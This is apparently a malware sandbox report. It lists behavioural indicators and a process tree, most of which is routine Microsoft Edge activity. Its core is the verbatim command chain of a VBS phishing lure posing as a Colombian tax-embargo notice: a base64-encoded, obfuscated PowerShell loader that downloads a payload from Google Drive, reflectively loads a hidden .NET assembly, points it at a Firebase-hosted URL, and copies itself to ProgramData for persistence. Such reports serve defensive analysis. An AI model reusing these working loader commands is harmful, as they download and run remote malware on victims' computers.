4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe

Suspicious use of SendNotifyMessage 56 IoCs

pid	Process
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe
4880	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 4772	5064	WScript.exe	88
PID 5064 wrote to memory of 4772	5064	WScript.exe	88
PID 4772 wrote to memory of 4760	4772	powershell.exe	90
PID 4772 wrote to memory of 4760	4772	powershell.exe	90
PID 4880 wrote to memory of 456	4880	msedge.exe	93
PID 4880 wrote to memory of 456	4880	msedge.exe	93
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 2776	4880	msedge.exe	94
PID 4880 wrote to memory of 4808	4880	msedge.exe	95
PID 4880 wrote to memory of 4808	4880	msedge.exe	95
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96
PID 4880 wrote to memory of 3244	4880	msedge.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENTO_SISTEMA_REQUERIMIENTO_DIAN_PROCESO_DE_EMBARGO_REVISION_INMEDIATA_ad8098904901470147f818615.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\carvoejar.vbs"
      4⤵
      PID:4044
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5964
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5C0D.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4784
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeefd346f8,0x7ffeefd34708,0x7ffeefd34718
  2⤵
  PID:456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
  2⤵
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:2528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:5208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
  2⤵
  PID:5360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1876 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1876 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:1844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
  2⤵
  PID:6040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
